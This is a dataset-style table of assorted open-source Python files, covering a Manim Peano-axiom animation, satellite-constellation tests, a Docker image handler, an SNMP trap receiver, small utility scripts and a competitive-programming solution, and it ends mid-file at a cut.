max_stars_repo_path
stringlengths 4
182
| max_stars_repo_name
stringlengths 6
116
| max_stars_count
int64 0
191k
| id
stringlengths 7
7
| content
stringlengths 100
10k
| size
int64 100
10k
|
---|---|---|---|---|---|
animations/peano_axioms.py
|
varunchodanker/ThreeAnimators
| 2 |
2170174
|
from manim import *
# NEED TO RECONFIGURE FOR MANIMCE
class Peano(Scene):
CONFIG = {
"r": COLOR_MAP["RED_D"],
"g": COLOR_MAP["GREEN_D"],
"g2": COLOR_MAP["GREEN_E"],
"t": COLOR_MAP["TEAL_D"],
"b": COLOR_MAP["BLUE_D"],
"y_of_dots": 1.75 * DOWN,
"y_of_nums": 2.25 * DOWN,
"title_text": TextMobject("Peano Axioms"),
"axiom1_text": TextMobject("1. 0 is a natural number"),
"axiom2_first_temp_text": TextMobject("2. If n is a natural number..."),
"axiom2_first_text": TextMobject("2. If n is a natural number, "),
"axiom2_last_text": TextMobject("then n++ is a natural number"),
"axiom3_text": TextMobject("3. 0 is not the successor of any natural number"),
"axiom4_first_temp_text": TextMobject("4. If n, m are natural numbers and n ≠ m..."),
"axiom4_first_text": TextMobject("4. If n, m are natural numbers and n ≠ m,"),
"axiom4_second_text": TextMobject("then n++ ≠ m++"),
"axiom4_third_temp_text": TextMobject("equivalently, if n++ = m++..."),
"axiom4_third_text": TextMobject("equivalently, if n++ = m++,"),
"axiom4_fourth_text": TextMobject("then n = m"),
"axiom4_final_text": TextMobject("4. Different natural numbers must have different successors"),
"zero_dot": Dot(),
"zero_num": TextMobject("0"),
"n_dot": Dot(),
"n_num": TextMobject("n"),
"succ_n_dot": Dot(),
"succ_n_num": TextMobject("n++"),
"m_dot": Dot(),
"m_num": TextMobject("m"),
"succ_m_dot": Dot(),
"succ_m_num": TextMobject("m++"),
}
def construct(self):
# grid = ImageMobject('tools/grid.png').scale(4)
# self.add(grid)
# self.intro()
self.axiom1()
self.axiom2()
self.axiom3()
# self.axiom4()
# self.axiom5()
def intro(self):
# Peano Axioms Title
self.play(Write(self.title_text))
self.wait(0.7)
self.play(FadeOut(self.title_text))
self.wait(0.5)
def axiom1(self):
# Add dot representing 0
self.play(
Write(self.zero_dot),
run_time=0.5
)
self.wait(0.2)
# Add text representing 0
self.zero_num.move_to(self.y_of_nums)
self.play(
Write(self.zero_num),
run_time=0.3
)
# Move zero dot down to zero text
self.zero_dot.generate_target()
self.zero_dot.target.move_to(self.y_of_dots)
self.play(
MoveToTarget(self.zero_dot),
run_time=1
)
self.wait(0.7)
# Add axiom text
self.play(Write(self.axiom1_text))
self.wait(1)
# Move axiom text to top left
self.axiom1_text.generate_target()
self.axiom1_text.target.scale(0.75).move_to(6.5 * LEFT + 3.3 * UP,
aligned_edge=UP + LEFT).set_color(self.b)
self.play(
MoveToTarget(self.axiom1_text),
run_time=1.65
)
self.wait(1)
def axiom2(self):
# x pos of n dot and n num
x_of_n = 2 * RIGHT
# Add dot representing n
self.n_dot.move_to(x_of_n).set_color(self.g)
self.play(
Write(self.n_dot),
run_time=0.5
)
self.wait(0.2)
# Add text representing n
self.n_num.move_to(x_of_n + self.y_of_nums).set_color(self.g)
self.play(
Write(self.n_num),
run_time=0.3
)
# Move n dot down to text
self.n_dot.generate_target()
self.n_dot.target.move_to(x_of_n + self.y_of_dots)
self.play(
MoveToTarget(self.n_dot),
run_time=1
)
self.wait(0.7)
# Add first part of axiom text
self.play(Write(self.axiom2_first_temp_text))
self.wait(0.5)
# Move axiom text to top left
self.play(
ReplacementTransform(
self.axiom2_first_temp_text,
self.axiom2_first_text.scale(0.75).next_to(self.axiom1_text, DOWN, aligned_edge=LEFT)
.set_color(self.b)
)
)
self.wait(0.5)
x_of_succ_n = 3.5 * RIGHT
# Add dot representing n++
self.succ_n_dot.move_to(x_of_succ_n).set_color(self.t)
self.play(
Write(self.succ_n_dot),
run_time=0.5
)
self.wait(0.2)
# Add text representing n
self.succ_n_num.move_to(x_of_succ_n + self.y_of_nums).set_color(self.t)
self.play(
Write(self.succ_n_num),
run_time=0.3
)
# Move n dot down to text
self.succ_n_dot.generate_target()
self.succ_n_dot.target.move_to(x_of_succ_n + self.y_of_dots)
self.play(
MoveToTarget(self.succ_n_dot),
run_time=1
)
self.wait(0.7)
# Add second part of axiom text
self.play(Write(self.axiom2_last_text))
self.wait(0.7)
# Move axiom text to top left
self.axiom2_last_text.generate_target()
self.axiom2_last_text.target.scale(0.75).next_to(self.axiom2_first_text, DOWN, buff=0.1, aligned_edge=LEFT) \
.set_color(self.b)
self.play(
MoveToTarget(self.axiom2_last_text),
run_time=1
)
self.wait(1)
def axiom3(self):
axiom3_motivations = TextMobject("Though right now, n++ can be anywhere...")
self.play(Write(axiom3_motivations))
self.wait(0.5)
succ_n = VGroup(self.succ_n_dot, self.succ_n_num)
succ_n.generate_target()
succ_n.target.shift(8 * LEFT)
self.play(
MoveToTarget(succ_n),
FadeOut(axiom3_motivations),
run_time=2
)
self.wait(0.5)
succ_n.generate_target()
succ_n.target.shift(5.5 * RIGHT)
self.play(MoveToTarget(succ_n), run_time=2)
self.wait(0.5)
succ_n.generate_target()
succ_n.target.shift(3.5 * RIGHT)
self.play(MoveToTarget(succ_n), run_time=2)
self.wait(0.5)
axiom3_motivations = TextMobject("...meaning it can be on zero!")
self.play(Write(axiom3_motivations))
self.wait(1)
succ_n.generate_target()
succ_n.target.shift(4.5*LEFT).set_color(self.r)
self.play(
MoveToTarget(succ_n),
FadeOut(self.zero_num),
run_time=2
)
self.wait(1)
axiom3_motivations.generate_target()
axiom3_motivations_1 = TextMobject("This shouldn't be allowed,")
axiom3_motivations_2 = TextMobject("leading us to the third axiom...").next_to(axiom3_motivations_1, DOWN)
axiom3_motivations.target = VGroup(axiom3_motivations_1, axiom3_motivations_2)
self.play(MoveToTarget(axiom3_motivations))
self.wait(3.5)
self.play(ReplacementTransform(axiom3_motivations, self.axiom3_text))
succ_n.generate_target()
succ_n.target.shift(3.5 * RIGHT).set_color(self.t)
self.play(
MoveToTarget(succ_n),
Write(self.zero_num),
run_time=2
)
self.wait(1)
self.axiom3_text.generate_target()
axiom3_text_1 = TextMobject("3. 0 is not the successor of")
axiom3_text_2 = TextMobject("any natural number").next_to(axiom3_text_1, DOWN, buff=0.1, aligned_edge=LEFT)
self.axiom3_text.target = VGroup(axiom3_text_1, axiom3_text_2)\
.scale(0.75)\
.next_to(self.axiom2_last_text, DOWN, aligned_edge=LEFT)\
.set_color(self.b)
self.play(
MoveToTarget(self.axiom3_text),
run_time=1
)
def axiom4(self):
pass
def axiom5(self):
pass
| 7,908 |
app/src/consts/CONSTS.py
|
parsariyahi/pars_messenger
| 0 |
2169024
|
DBMS='mysql'
DB_HOST='localhost'
DB_NAME='pars_messenger'
DB_USER='prrh'
DB_PASSWORD='<PASSWORD>'
"""
:pattern <dbms>://<username>:<password>@host/<database name>
"""
SQLALCHEMY_DATABASE_URI=f"{DBMS}://{DB_USER}:{DB_PASSWORD}@{DB_HOST}/{DB_NAME}"
SECRET_KEY = '<KEY>'
| 268 |
clean.py
|
peterwilliams97/blank
| 0 |
2167749
|
"""
PDF to text conversion
"""
import string
import re
from ngrams import Pw
RE_SPACE = re.compile(r'[\t ]+', re.MULTILINE | re.DOTALL)
punctuation = string.punctuation
punctuation = punctuation.replace("-", "") # don't remove hyphens
RE_BREAK = re.compile(r'(\w+)-([\n\f\r]+)(\w+)([%s]*)\s*' % punctuation,
re.MULTILINE | re.DOTALL)
hyphenated = set()
def unbreak(m):
global hyphenated
w00 = m.group(0)
w0 = m.group(1) + '-' + m.group(2) + m.group(3)
w1 = m.group(1) + '-' + m.group(3)
w2 = m.group(1) + m.group(3)
w1n = w1 + m.group(4) + '\n'
w2n = w2 + m.group(4) + '\n'
p0 = Pw(w0)
p1 = Pw(w1)
p2 = Pw(w1)
if p1 < 1e-32 and p2 < 1e-34:
p1a = Pw(m.group(1)) * Pw(m.group(3))
if p1a > 1e-27:
p1 = p1a
probs = [(p, i) for i, p in enumerate([p0, p1, p2])]
words = [w00, w1n, w2n]
_, best = max(probs)
# assert m.group(1) != 'indi' or words[best] == 'individual\n', '"%s" %s %s %s "%s"' % (
# m.group(0), m.groups(), [p0, p1, p2],
# best, words[best])
if best != 2:
hyphenated.add((w1, w2))
return words[best]
def dehyphenate(text):
"""
The businesses around newspapers, books, and mag-
azines are changing on a daily basis; even still, global electronic com-
munication over the Internet
=>
The businesses around newspapers, books, and magazines
are changing on a daily basis; even still, global electronic communication
over the Internet
"""
assert isinstance(text, str), type(text)
# print([type(x) for x in (text, RE_BREAK, unbreak)])
unbroke = RE_BREAK.sub(unbreak, text)
return unbroke
| 1,763 |
tests/tests.py
|
samsipe/SatelliteConstellationCreator
| 7 |
2169475
|
from __init__ import add_parent_directory # Needed for running tests in pipelines
if __name__ == "__main__":
add_parent_directory() # This must stay prior to the satellite_constellation imports
from satellite_constellation.Constellation import *
from satellite_constellation.SceneCreator import *
import unittest
import math
class TestConstellationCreator(unittest.TestCase): # Test for errors in the constellation creator
def test_0_constellations(self): # Check for number error with 0 constellations
constellation_num = 0
T, P, F = 1, 1, 1
with self.assertRaises(ConstellationNumberError) as error:
constellation = constellation_creator(constellation_num, [T], [P], [F], [30], [1000], [0.5], [20])
def test_constellation_mismatch(self): # Check for mismatch error catching with an empty satellite nums list
constellation_num = 1
T, P, F = [18, 18], [3, 3], [1, 1]
satellite_nums = [T]
with self.assertRaises(ConstellationConfigurationError) as error:
constellation = constellation_creator(constellation_num, T, P, F, [30], [1000], [0.5], [20])
def test_plane_mismatch(
self): # Check for mismatch error if the satellites cannot be evenly spread across the planes
T, P, F = 1, 2, 1
plane_nums = [P]
satellite_nums = [T]
with self.assertRaises(ConstellationPlaneMismatchError):
constellation = constellation_creator(1, satellite_nums, plane_nums, [F], [30], [1000], [0.5], [20])
def test_phasing(self):
T, P, F = 18, 3, 3 # This would put the satellites right on top of eachother
with self.assertRaises(PhaseError):
constellation = constellation_creator(1, [T], [P], [F], [30], [1000], [0.5], [20])
T, P, F = 18, 3, 6 # This would also put the satellites right on top of eachother
with self.assertRaises(PhaseError):
constellation = constellation_creator(1, [T], [P], [F], [30], [1000], [0.5], [20])
def test_inclination(self):
T, P, F = 2, 2, 1
inclination = 100
with self.assertRaises(InclinationError):
constellation = constellation_creator(1, [T], [P], [F], [inclination], [1000], [0.5], [20])
def test_altitude(self):
T, P, F = 2, 2, 1
altitude = -1
with self.assertRaises(AltitudeError):
constellation = constellation_creator(1, [T], [P], [F], [30], [altitude], [0.5], [20])
altitude = 50
with self.assertRaises(AltitudeError):
constellation = constellation_creator(1, [T], [P], [F], [30], [altitude], [0.5], [20])
def test_eccentricity(self):
T, P, F = 2, 2, 1
eccentricity = -1
with self.assertRaises(EccentricityError):
constellation = constellation_creator(1, [T], [P], [F], [30], [1000], [eccentricity], [20])
eccentricity = 2
with self.assertRaises(EccentricityError):
constellation = constellation_creator(1, [T], [P], [F], [30], [1000], [eccentricity], [20])
def test_beam_width(self):
T, P, F = 2, 2, 1
beam_width = 190
with self.assertRaises(BeamError): # Beam width > 180
constellation = constellation_creator(1, [T], [P], [F], [30], [1000], [0.5], [beam_width])
T, P, F = 2, 2, 1
beam_width = 0
with self.assertRaises(BeamError): # Beam width = 0
constellation = constellation_creator(1, [T], [P], [F], [30], [1000], [0.5], [beam_width])
class TestSatellite(unittest.TestCase):
def setUp(self):
self.satellite = Satellite("testSat", 1000, 0, 10, 20, 30, 40, 30, rads=False)
def test_true_altitude(self):
self.assertEqual(self.satellite.true_alt, 7371)
def test_deg_to_rad(self):
self.assertAlmostEqual(0.1745, self.satellite.inclination_r, 4)
self.assertAlmostEqual(0.3491, self.satellite.right_ascension_r, 4)
self.assertAlmostEqual(0.5236, self.satellite.perigee_r, 4)
self.assertAlmostEqual(0.6981, self.satellite.ta_r, 4)
def test_rad_to_degree(self):
rad_sat = Satellite("testSat", 1000, 0, math.pi / 5, math.pi / 4, math.pi / 3, math.pi / 2, math.pi / 5,
rads=True)
self.assertAlmostEqual(36, rad_sat.inclination, 4)
self.assertAlmostEqual(45, rad_sat.right_ascension, 4)
self.assertAlmostEqual(60, rad_sat.perigee, 4)
self.assertAlmostEqual(90, rad_sat.ta, 4)
class TestWalker(unittest.TestCase):
def setUp(self):
self.walker_constellation = WalkerConstellation(18, 3, 1, 30, 1000, 0, 20)
def test_sats_per_plane(self):
self.assertEqual(6, self.walker_constellation.sats_per_plane)
def test_phasing(self):
self.assertEqual(20, self.walker_constellation.correct_phasing)
class TestStreets(unittest.TestCase):
def setUp(self):
self.streets_constellation = SOCConstellation(1, 10, 1500, 60, [20], 0.8, 100)
def test_perigee(self):
self.assertAlmostEqual(self.streets_constellation.perigee, 7871, 3)
def test_semi_major(self):
self.assertAlmostEqual(self.streets_constellation.semi_major, 39355, 3)
def test_orbital_period(self):
self.assertAlmostEqual(self.streets_constellation.orbital_period, 77700.55, 1)
def test_earth_radial_coverage(self):
self.assertAlmostEqual(self.streets_constellation.earth_coverage_radius, 868.7, 1)
def test_earth_angular_coverage(self):
self.assertAlmostEqual(self.streets_constellation.earth_coverage_angle, 0.136, 3)
def test_required_satellites_by_coverage(self):
self.assertAlmostEqual(self.streets_constellation.num_satellites, 30)
def test_required_satellites_by_period(self):
streets_constellation = SOCConstellation(1, 10, 1500, 60, [20], 0.8, 7770)
self.assertAlmostEqual(streets_constellation.num_satellites, 10, 1)
class TestFlower(unittest.TestCase):
# Test cases from "The Flower Constellations - Theory, Design Process and Applications" - Wilkins, P.M
def setUp(self):
self.flower_suite = [FlowerConstellation(8, 1, 9, 1, 9, 0, 0, 2500, 0),
FlowerConstellation(769, 257, 4, 1, 4, 0, 0, 600, 0),
FlowerConstellation(4, 1, 4, 1, 4, 0, 0, 600, 0),
FlowerConstellation(3, 1, 4, 1, 4, 0, 0, 600, 0),
FlowerConstellation(3, 1, 4, 1, 7, 0, 0, 600, 0),
FlowerConstellation(3, 1, 4, 1, 2, 0, 0, 600, 0),
FlowerConstellation(3, 2, 4, 1, 2, 0, 0, 600, 0),
FlowerConstellation(31, 11, 30, 7, 10, 0, 0, 9000, 0),
FlowerConstellation(37, 18, 57, 6, 19, 0, 0, 19702, 0),
FlowerConstellation(15, 7, 49, 23, 49, 0, 0, 19702, 0)]
def test_num_satellites(self):
num_sats = []
num_sats_test = [9, 4, 4, 4, 4, 2, 4, 30, 57, 49]
for idx in range(len(self.flower_suite)):
num_sats.append(self.flower_suite[idx].num_satellites)
self.assertEqual(num_sats, num_sats_test)
def test_max_satellites(self):
max_sats = []
max_sats_test = [9, 1028, 4, 4, 7, 2, 4, 110, 342, 343]
for idx in range(len(self.flower_suite)):
max_sats.append(self.flower_suite[idx].max_sats)
self.assertEqual(max_sats, max_sats_test)
def test_max_sats_per_orbit(self):
max_sats_per_orbit = []
max_sats_per_orbit_test = [1, 257, 1, 1, 1, 1, 2, 11, 18, 7]
for idx in range(len(self.flower_suite)):
max_sats_per_orbit.append(self.flower_suite[idx].max_sats_per_orbit)
self.assertEqual(max_sats_per_orbit, max_sats_per_orbit_test)
def test_raan_spacing(self):
raan_spacing_test = [-40, -90, -90, -90, -51.42, -180, -180, -252, -113.68, -168.97]
for idx in range(len(self.flower_suite)):
self.assertAlmostEqual(raan_spacing_test[idx], self.flower_suite[idx].raan_spacing, delta=0.1)
def test_mean_anomaly_spacing(self):
mean_anomaly_spacing_test = [320, 269.2, 360, 270, 154.28, 180, 270, 350.18, 233.68, 2.099]
for idx in range(len(self.flower_suite)):
self.assertAlmostEqual(mean_anomaly_spacing_test[idx], self.flower_suite[idx].mean_anomaly_spacing,
delta=0.1)
def test_raan_anomaly_simple(self):
param_list = []
param_list_test = [[0, 0], [40, 40], [80, 80], [120, 120], [160, 160], [200, 200], [240, 240], [280, 280],
[320, 320]]
for idx in range(len(self.flower_suite[0].raan)):
param_list.append([self.flower_suite[0].raan[idx], self.flower_suite[0].mean_anomaly[idx]])
self.assertTrue(len(param_list) == len(param_list_test))
for idx in range(len(param_list)):
self.assertTrue(param_list_test[idx] in param_list)
def test_raan_anomaly_complex(self):
param_list = []
param_list_test = [[0, 0], [0, 180], [180, 90], [180, 270]]
for idx in range(len(self.flower_suite[6].raan)):
param_list.append([self.flower_suite[6].raan[idx], self.flower_suite[6].mean_anomaly[idx]])
for idx in range(len(param_list)):
self.assertTrue(param_list_test[idx] in param_list)
if __name__ == '__main__':
unittest.main()
| 9,487 |
shutdown.py
|
radiodee1/awesome-chatbot
| 22 |
2169601
|
#!/usr/bin/python
try:
import RPi.GPIO as GPIO
except:
try:
import Jetson.GPIO as GPIO
except:
exit()
pass
import time
import subprocess
# we will use the pin numbering to match the pins on the Pi, instead of the
# GPIO pin outs (makes it easier to keep track of things)
GPIO.setmode(GPIO.BOARD)
# use the same pin that is used for the reset button (one button to rule them all!)
GPIO.setup(5, GPIO.IN, pull_up_down=GPIO.PUD_UP)
oldButtonState1 = True
while True:
# grab the current button state
buttonState1 = GPIO.input(5)
# check to see if button has been pushed
if buttonState1 != oldButtonState1 and buttonState1 == False:
subprocess.call("shutdown -h now", shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
oldButtonState1 = buttonState1
time.sleep(.1)
| 875 |
test/utils/vcf2vars.py
|
gantzgraf/vape
| 4 |
2170147
|
#!/usr/bin/env python3
import pysam
import sys
if __name__ == '__main__':
if len(sys.argv) > 2:
sys.exit("Usage: {} [in.vcf]".format(sys.argv[0]))
if len(sys.argv) > 1:
vcf = pysam.VariantFile(sys.argv[1])
else:
vcf = pysam.VariantFile('-')
pos_offset = 1000000
for record in vcf:
print("{}:{}-{}/{}".format(record.chrom,
record.pos,
record.ref,
','.join(record.alts)))
vcf.close()
| 544 |
app/auth/email.py
|
karomag/microblog
| 0 |
2169477
|
# -*- coding:utf-8 -*-
"""Email module."""
from flask import current_app, render_template
from flask_babel import _
from app.email import send_email
def send_password_reset_email(user):
"""Generates the password reset email.
Args:
user: User.
"""
token = user.get_reset_password_token()
send_email(
_('[Microblog] Reset Your Password'),
sender=current_app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template(
'email/reset_password.txt',
user=user,
token=token,
),
html_body=render_template(
'email/reset_password.html',
user=user,
token=token,
),
)
| 735 |
ecranner/docker.py
|
homoluctus/ecranner
| 6 |
2162942
|
import docker
from docker.errors import ImageNotFound, APIError
from .log import get_logger
from .exceptions import LoginRegistryError, ImageMismatchError
logger = get_logger()
class DockerImageHandler:
UNIX_SOCKET = 'unix:///var/run/docker.sock'
def __init__(self, base_url=None, timeout=60):
base_url = base_url or self.UNIX_SOCKET
self.docker_client = docker.DockerClient(
base_url=base_url,
version='auto',
timeout=timeout,
)
def __enter__(self):
return self
def __exit__(self, *exc):
self.close()
def close(self):
self.docker_client.close()
def pull(self, image_name, all_tags=False, username=None, password=<PASSWORD>):
"""Pull a Docker image
Args:
image_name (str): Docker image name included tag to pull
all_tags (boolean): Whether all image tags are pulled
when no tag is specified.
The image of `latest` tag is pulled if all is False.
username (str)
password (<PASSWORD>)
Returns:
image (list): in case, no tag is specified and all_tags is True
pulled_image_name (str): a docker image name pulled the registry
Raises:
docker.errors.APIError
ImageMismatchError
"""
# pre check if specified docker image is already pulled
try:
result = self.exists(image_name)
if result:
return image_name
except APIError:
result = False
auth_config = {}
if username and password:
auth_config = {'username': username, 'password': password}
if not self.tag_exists(image_name) and not all_tags:
self.add_tag(image_name)
try:
image = self.docker_client.images.pull(
image_name,
auth_config=auth_config
)
except APIError as err:
raise err
if isinstance(image, list):
return image
pulled_image_name = image.tags[0]
if pulled_image_name != image_name:
raise ImageMismatchError(f'''
Pulled image: {pulled_image_name}
Expected: {image_name}
''')
logger.info(f'Pulled {image_name}')
return pulled_image_name
def remove(self, image_name, force=False):
"""Remove image pulled in local machine
Args:
image_name (str)
force (boolean)
Returns:
boolean
"""
if not isinstance(image_name, str):
raise TypeError(f'Expected str object, \
but {image_name} is {type(image_name)} object')
if not self.exists(image_name):
return True
res = self.docker_client.images.remove(image_name, force=force)
logger.debug(f'Response from Docker Engine: {res}')
# Check again if specified docker image exists
if self.exists(image_name):
return False
return True
def remove_images(self, images, force=False):
"""Remove docker images pulled in local
Args:
images (list): pulled docker images
force (boolean): force to remove
Returns:
True: succeed to remove all images
failed_images (list)
"""
failed_images = []
for image in images:
result = self.remove(image, force)
if not result:
failed_images.append(image)
return True if not failed_images else failed_images
def exists(self, image_name):
"""Make sure if specified docker image exists in local
Args:
image_name (str)
Returns:
boolean
Raises:
docker.errors.APIError
"""
if not isinstance(image_name, str):
raise TypeError(f'Expected str object, \
but argument is {type(image_name)} object')
try:
self.docker_client.images.get(image_name)
except ImageNotFound:
return False
except APIError as err:
raise err
else:
logger.debug(f'Found {repr(image_name)} Docker image')
return True
def login(self, username, password, registry, reauth=False):
"""Login to a registry
Args:
username (str)
password (<PASSWORD>)
registry (str)
reauth (boolean)
Returns:
True
Raises:
LoginRegistryError
docker.errors.APIError
"""
try:
res = self.docker_client.login(
username=username,
password=password,
registry=registry,
reauth=reauth
)
except APIError as err:
raise LoginRegistryError(f'Failed to Login to ECR: {err}')
else:
logger.debug(res)
return True
def tag_exists(self, image_name):
"""Checks if image_name contains tag
Args:
image_name (str)
Returns:
boolean
"""
tag_prefix = ':'
if tag_prefix in image_name \
and not image_name.endswith(tag_prefix):
return True
return False
def add_tag(self, image_name, tag='latest'):
"""Add a tag to image name
Args:
image_name (str)
tag (str)
Returns:
image_name
"""
if image_name.endswith(':'):
image_name += tag
else:
image_name += f':{tag}'
return image_name
| 5,797 |
dolphin/alert_manager/trap_receiver.py
|
ThisIsClark/dolphin
| 0 |
2169460
|
# Copyright 2020 The SODA Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from oslo_log import log
from pysnmp.carrier.asyncore.dgram import udp
from pysnmp.entity import engine, config
from pysnmp.entity.rfc3413 import ntfrcv
from pysnmp.proto.api import v2c
from pysnmp.smi import builder, view, rfc1902
from dolphin import exception
from dolphin.alert_manager import alert_processor
from dolphin.alert_manager import constants
LOG = log.getLogger(__name__)
# Currently static mib file list is loaded
# Mechanism to be changed to load all mib file
MIB_LOAD_LIST = ['SNMPv2-MIB','IF_MIB']
class TrapReceiver(object):
"""Trap listening and processing functions"""
def __init__(self, trap_receiver_address, trap_receiver_port,
snmp_mib_path, mib_view_controller=None, snmp_engine=None):
self.mib_view_controller = mib_view_controller
self.snmp_engine = snmp_engine
self.trap_receiver_address = trap_receiver_address
self.trap_receiver_port = trap_receiver_port
self.snmp_mib_path = snmp_mib_path
def _mib_builder(self):
"""Loads given set of mib files from given path."""
mib_builder = builder.MibBuilder()
try:
self.mib_view_controller = view.MibViewController(mib_builder)
# set mib path to mib_builder object and load mibs
mib_path = builder.DirMibSource(self.snmp_mib_path),
mib_builder.setMibSources(*mib_path)
if len(MIB_LOAD_LIST) > 0:
mib_builder.loadModules(*MIB_LOAD_LIST)
except Exception:
raise ValueError("Mib load failed.")
def _add_transport(self):
"""Configures the transport parameters for the snmp engine."""
try:
config.addTransport(
self.snmp_engine,
udp.domainName,
udp.UdpTransport().openServerMode(
(self.trap_receiver_address, int(self.trap_receiver_port)))
)
except Exception:
raise ValueError("Port binding failed the provided port is in use.")
@staticmethod
def _extract_oid_value(var_bind):
"""Extracts oid and value from var binds.
ex: varbind = (SNMPv2-MIB::snmpTrapOID.0 = SNMPv2-MIB::coldStart)
oid = snmpTrapOID
val = coldStart
"""
# Separate out oid and value strings
var_bind_info = var_bind.prettyPrint()
var_bind_info = var_bind_info.split("=", 1)
oid = var_bind_info[0]
val = var_bind_info[1]
# Extract oid from oid string
# Example: get snmpTrapOID from SNMPv2-MIB::snmpTrapOID.0
oid = re.split('[::.]', oid)[2]
# Value can contain mib name also, if so, extract value from it
# Ex: get coldStart from SNMPv2-MIB::coldStart
if "::" in val:
val = re.split('[::]', val)[2]
val = val.strip()
return oid, val
def _cb_fun(self, state_reference, context_engine_id, context_name,
var_binds, cb_ctx):
"""Callback function to process the incoming trap."""
exec_context = self.snmp_engine.observer.getExecutionContext(
'rfc3412.receiveMessage:request')
LOG.info('#Notification from %s \n#ContextEngineId: "%s" '
'\n#ContextName: ''"%s" \n#SNMPVER "%s" \n#SecurityName "%s" '
% (
'@'.join(
[str(x) for x in exec_context['transportAddress']]),
context_engine_id.prettyPrint(),
context_name.prettyPrint(), exec_context['securityModel'],
exec_context['securityName']))
var_binds = [rfc1902.ObjectType(rfc1902.ObjectIdentity(x[0]), x[1])
.resolveWithMib(self.mib_view_controller)
for x in var_binds]
alert = {}
for var_bind in var_binds:
oid, value = self._extract_oid_value(var_bind)
alert[oid] = value
# Fill additional info to alert_info
# transportAddress contains both ip and port, extract ip address
alert['transport_address'] = exec_context['transportAddress'][0]
# Handover trap info to alert processor for model translation and export
try:
alert_processor.AlertProcessor().process_alert_info(alert)
except (exception.AccessInfoNotFound,
exception.StorageNotFound,
exception.InvalidResults) as e:
# Log and end the trap processing error flow
LOG.error(e)
except Exception as e:
# Unexpected exception occurred
LOG.error(e)
def _snmp_v2v3_config(self):
"""Configures snmp v2 and v3 user parameters."""
community_str = constants.SNMP_COMMUNITY_STR
config.addV1System(self.snmp_engine, community_str, community_str)
auth_priv_protocols = {
'usmHMACMD5AuthProtocol': config.usmHMACMD5AuthProtocol,
'usmHMACSHAAuthProtocol': config.usmHMACSHAAuthProtocol,
'usmAesCfb128Protocol': config.usmAesCfb128Protocol,
'usmAesCfb256Protocol': config.usmAesCfb256Protocol,
'usmAesCfb192Protocol': config.usmAesCfb192Protocol,
'usmDESPrivProtocol': config.usmDESPrivProtocol,
'usmNoAuthProtocol': config.usmNoAuthProtocol,
'usmNoPrivProtocol': config.usmNoPrivProtocol
}
config.addV3User(
self.snmp_engine, userName=constants.SNMP_USM_USER,
authKey=constants.SNMP_V3_AUTHKEY,
privKey=constants.SNMP_V3_PRIVKEY,
authProtocol=auth_priv_protocols.get(
constants.SNMP_V3_AUTH_PROTOCOL, config.usmNoAuthProtocol),
privProtocol=auth_priv_protocols.get(
constants.SNMP_V3_PRIV_PROTOCOL, config.usmNoPrivProtocol),
securityEngineId=v2c.OctetString(
hexValue=constants.SNMP_ENGINE_ID))
return
def start(self):
"""Starts the snmp trap receiver with necessary prerequisites."""
snmp_engine = engine.SnmpEngine()
self.snmp_engine = snmp_engine
try:
# Load all the mibs and do snmp config
self._mib_builder()
self._snmp_v2v3_config()
# Register callback for notification receiver
ntfrcv.NotificationReceiver(snmp_engine, self._cb_fun)
# Add transport info(ip, port) and start the listener
self._add_transport()
snmp_engine.transportDispatcher.jobStarted(
constants.SNMP_DISPATCHER_JOB_ID)
except Exception:
raise ValueError("Failed to setup for trap listener.")
try:
LOG.info("Starting trap receiver.")
snmp_engine.transportDispatcher.runDispatcher()
except Exception:
snmp_engine.transportDispatcher.closeDispatcher()
raise ValueError("Failed to start trap listener.")
def stop(self):
"""Brings down the snmp trap receiver."""
# Go ahead with shutdown, ignore if any errors happening during the
# process as it is shutdown
if self.snmp_engine:
self.snmp_engine.transportDispatcher.closeDispatcher()
LOG.info("Trap receiver stopped.")
| 7,870 |
__init__.py
|
OliWright/mqtt_fishtank_lights
| 0 |
2169495
|
from .celestial import CelestialController
from .colour_tables import RgbWW
from .colour_tables import ColourTable
from .fishtank_lights import LegacyFishtankLights
from .fishtank_lights import FishtankLights
| 214 |
main.py
|
mattianeroni/2DBinPacking
| 0 |
2169678
|
import packing
import utils
from packing import test
import itertools
orderlines = utils.read_problem("./testproblem.csv")
cases = tuple(itertools.chain(
orderlines[0].cases,
orderlines[1].cases,
orderlines[2].cases,
orderlines[3].cases,
orderlines[6].cases,
))
test(packing.MRBL, cases, (120,80))
test(packing.GBAF, cases, (120,80), splitting="shorteraxis")
test(packing.SWWF, cases, (120,80))
| 420 |
yukicoder/yuki202.py
|
knuu/competitive-programming
| 1 |
2169116
|
from math import hypot
N = int(input())
def isOverlap(x1, y1, x2, y2, r=10):
return hypot(x1-x2, y1-y2) < r * 2
def check(x, y):
near = [(-1, -1), (0, -1), (1, -1),
(-1, 0), (0, 0), (1, 0),
(-1, 1), (0, 1), (1, 1)]
for dx, dy in near:
nx = x//20 + dx
ny = y//20 + dy
if 0 <= nx <= 1000 and 0 <= ny <= 1000:
for cx, cy in field[nx][ny]:
# print(x, y, nx, ny, cx, cy, isOverlap(x, y, cx, cy))
if isOverlap(x, y, cx, cy):
return False
return True
field = [[[] for _ in range(1001)] for _ in range(1001)]
ans = 0
for _ in range(N):
x, y = map(int, input().split())
if check(x, y):
ans += 1
field[x//20][y//20].append((x, y))
print(ans)
| 803 |
servers/server_config.py
|
LGWingEmulator/tools-buildSrc
| 0 |
2169967
|
from distutils.spawn import find_executable
import itertools
import logging
import os
import platform
import subprocess
try:
import _winreg as winreg
except:
# Winreg is a windows only thing..
pass
def disable_debug_policy():
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting") as registry_key:
winreg.SetValue(registry_key, "DontShowUI", 1)
except:
logging.error("Failed to retrieve, set status.")
# Next clear out the just in time debuggers.
todelete = [(r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug", "Debugger"),
(r"SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug", "Debugger")]
for current_key, entry in todelete:
try:
